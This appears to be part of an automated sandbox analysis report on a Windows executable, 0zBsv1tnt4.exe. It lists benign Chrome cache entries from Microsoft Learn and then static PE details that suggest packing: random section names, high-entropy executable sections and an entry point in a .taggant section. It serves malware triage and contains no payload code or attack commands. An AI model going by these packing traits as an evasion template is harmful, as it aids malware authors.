....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?\|..H+Dd.....Y%....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m

Chrome Cache Entry: 88

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1154
Entropy (8bit):	4.59126408969148
Encrypted:	false
SSDEEP:	24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
MD5:	37258A983459AE1C2E4F1E551665F388
SHA1:	603A4E9115E613CC827206CF792C62AEB606C941
SHA-256:	8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
SHA-512:	184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
Malicious:	false
Preview:	<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V

Chrome Cache Entry: 89

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3130
Entropy (8bit):	4.790069981348324
Encrypted:	false
SSDEEP:	48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
MD5:	EBA6E81304F2F555E1D2EA3126A18A41
SHA1:	61429C3FE837FD4DD68E7B26678F131F2E00070D
SHA-256:	F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
SHA-512:	3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
Malicious:	false
Preview:	{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/

Chrome Cache Entry: 90

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	15427
Entropy (8bit):	7.784472070227724
Encrypted:	false
SSDEEP:	384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
MD5:	3062488F9D119C0D79448BE06ED140D8
SHA1:	8A148951C894FC9E968D3E46589A2E978267650E
SHA-256:	C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
SHA-512:	00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
Malicious:	false
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0-....\|...X..s...Z.Y{....w..5.._s..x...E.......... ..................... ..................{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`......4..G.\|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...\|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....

Chrome Cache Entry: 91

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	16
Entropy (8bit):	3.875
Encrypted:	false
SSDEEP:	3:HMB:k
MD5:	0B04EA412F8FC88B51398B1CBF38110E
SHA1:	E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
SHA-256:	7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
SHA-512:	6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
Malicious:	false
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
Preview:	CgkKBw2/5iXyGgA=

Chrome Cache Entry: 92

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	27868
Entropy (8bit):	5.155680085584642
Encrypted:	false
SSDEEP:	768:63ZUfTvLg6jLjnjrjGjXMQjtzjMFzXY8v1gWj/rlOVqnACpK3o3hhl0OU2/8BlsX:BTvL7HBJv11pOVqlh382/rIN1Y
MD5:	0A0F2E1CCB8E5F7C38CB11B101A8941F
SHA1:	112F4B7CB3DEDB9D9744CAC000E05DC949E89891
SHA-256:	DBDB03D01BA044C4072BBC169C1E54D05A3D89623D2EBEAC28AC89ABDA3ABC2A
SHA-512:	9BD4E9C2415FB62E55D04DDEB9ECE04CB9AE2B8F8B93632A11A0AFD1CE6A632DF7D58DD571BF34C6E8E99107E80340CFAFF4BB4A8E18D05B5CAA7445DE55839C
Malicious:	false
Preview:	{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"

Chrome Cache Entry: 93

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65410)
Category:	downloaded
Size (bytes):	195719
Entropy (8bit):	5.430057012529021
Encrypted:	false
SSDEEP:	3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVli2:Wof3G0NSkNzMeO7z/l3lh
MD5:	9445D8D43537540BC89651C93A9C3832
SHA1:	EC3066770D52DB58CB7E44C54C3ABAA40CEB121A
SHA-256:	586D6261C80CBF8CDEC59DE01F1A1D09B32C04E87431E4333A0BF4D8990C2755
SHA-512:	F2BB9BB14C24883499AF2FAD35EE95AF7BF3D9B0431D8072C54C9D5946C751E04D952F5AD5D937F6CBC7C56177FA2091A5A6F33318F2907E9D3628C28E7FFC9C
Malicious:	false
URL:	https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
Preview:	/!. 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e\|\|self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]\|\|{},d=(d=e)[l="oneDS"]=d[l]\|\|{},e=f[o]=f[o]\|\|{},p=e.v=e.v\|\|[],l=d[o]=d[o]\|\|{},g=l.v=l.v\|\|[];for(i in(l.o=l.o\|\|[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]\|\|(g[i]="---"),(u[r]=u[r]\|\|[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e\|\|t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]

Chrome Cache Entry: 94

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	downloaded
Size (bytes):	27868
Entropy (8bit):	5.155680085584642
Encrypted:	false
SSDEEP:	768:63ZUfTvLg6jLjnjrjGjXMQjtzjMFzXY8v1gWj/rlOVqnACpK3o3hhl0OU2/8BlsX:BTvL7HBJv11pOVqlh382/rIN1Y
MD5:	0A0F2E1CCB8E5F7C38CB11B101A8941F
SHA1:	112F4B7CB3DEDB9D9744CAC000E05DC949E89891
SHA-256:	DBDB03D01BA044C4072BBC169C1E54D05A3D89623D2EBEAC28AC89ABDA3ABC2A
SHA-512:	9BD4E9C2415FB62E55D04DDEB9ECE04CB9AE2B8F8B93632A11A0AFD1CE6A632DF7D58DD571BF34C6E8E99107E80340CFAFF4BB4A8E18D05B5CAA7445DE55839C
Malicious:	false
URL:	https://learn.microsoft.com/en-us/banners/index.json
Preview:	{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"

Chrome Cache Entry: 95

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	15427
Entropy (8bit):	7.784472070227724
Encrypted:	false
SSDEEP:	384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
MD5:	3062488F9D119C0D79448BE06ED140D8
SHA1:	8A148951C894FC9E968D3E46589A2E978267650E
SHA-256:	C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
SHA-512:	00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
Malicious:	false
URL:	https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
Preview:	.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0-....\|...X..s...Z.Y{....w..5.._s..x...E.......... ..................... ..................{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`......4..G.\|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...\|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....

Chrome Cache Entry: 96

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	1432
Entropy (8bit):	4.986131881931089
Encrypted:	false
SSDEEP:	24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
MD5:	6B8763B76F400DC480450FD69072F215
SHA1:	6932907906AFCF8EAFA22154D8478106521BC9EE
SHA-256:	3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
SHA-512:	8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
Malicious:	false
URL:	https://learn.microsoft.com/static/assets/0.4.029026183/global/deprecation.js
Preview:	// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &

Chrome Cache Entry: 97

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	464328
Entropy (8bit):	5.0747157240281755
Encrypted:	false
SSDEEP:	6144:XegPrbKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:1KCerXyUh
MD5:	875E7F3672FEC41DDB5A2386D2331531
SHA1:	282979933E99BDE3A6342DC1EF93FBC51682F2C3
SHA-256:	F205B3CBA340ECB0B5D45E5DE6D385947CC4C21248707A90BFD5894E9B61F3C9
SHA-512:	67A3C1D8FF089E01C20962D96968DE43F3E8D49B474C396F08827EE891C0315693634E663D3148D7441B501EA6939A7D84A80B1E855B7C2A8BCB17E0013AFAD4
Malicious:	false
URL:	https://learn.microsoft.com/static/assets/0.4.029026183/styles/site-ltr.css
Preview:	.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0

Chrome Cache Entry: 98

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (52717), with no line terminators
Category:	dropped
Size (bytes):	52717
Entropy (8bit):	5.462668685745912
Encrypted:	false
SSDEEP:	1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
MD5:	413FCC759CC19821B61B6941808B29B5
SHA1:	1AD23B8A202043539C20681B1B3E9F3BC5D55133
SHA-256:	DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
SHA-512:	E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
Malicious:	false
Preview:	var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)\|\|Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)

Chrome Cache Entry: 99

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (52717), with no line terminators
Category:	downloaded
Size (bytes):	52717
Entropy (8bit):	5.462668685745912
Encrypted:	false
SSDEEP:	1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
MD5:	413FCC759CC19821B61B6941808B29B5
SHA1:	1AD23B8A202043539C20681B1B3E9F3BC5D55133
SHA-256:	DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
SHA-512:	E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
Malicious:	false
URL:	https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
Preview:	var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)\|\|Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.551389179332118
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	0zBsv1tnt4.exe
File size:	2'997'760 bytes
MD5:	27e0a573048fadb3dd4b3b2454c8eda5
SHA1:	c841c7fd14f4982e37aed56b25c0d748902fa9e2
SHA256:	6d6884e9912854c20c4dea409280402b3e27a0448407ad7f37c3fb642ee60525
SHA512:	ab59c135d12624748a9c1275d99d65cf479a96a3d6c3a9be948af2c160ebc703b632cf923c9cb6c62cde8029d57ddbbde6affc2a12fa0fe4d8cfe91a8a6c2ffb
SSDEEP:	24576:iLrBn00q7pq7QKLT7tGAyhypbF0aNvGxBXrLrTYcXyvoMCLhCMUSUmyeXPIJ1D/7:iLdn8sRjli3AOygMCVCxmRXPGrBrA
TLSH:	5AD54AA2A508B2CBD0EF67F89527CDC29D6D46B9471048CB9C6C64BABD63CC135B7C24
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..............................0...........@...........................0......X....@.................................Y@..m..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x709000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FC22D0EFA3Ah
setl byte ptr [00000000h]
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x54059	0x6d	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x541f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x52000	0x26400	da4387e9dce6bca7bba9a93f1aa0211c	False	0.9996425653594772	data	7.97845575818733	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x53000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x54000	0x1000	0x200	39a711a7d804ccbc2a14eea65cf3c27e	False	0.154296875	data	1.0789976601211375	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
xkuacxgz	0x55000	0x2b3000	0x2b2200	1deacc29ac0b6fdd6a0eaf8fb5693fdd	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
pzmqirjh	0x308000	0x1000	0x400	c43b4932bf0b297b80b034e699d615d5	False	0.7451171875	data	5.870799495499973	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x309000	0x3000	0x2200	fc9509af136808239cbf8c5b3a9a31c8	False	0.006548713235294118	DOS executable (COM)	0.019571456231530684	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

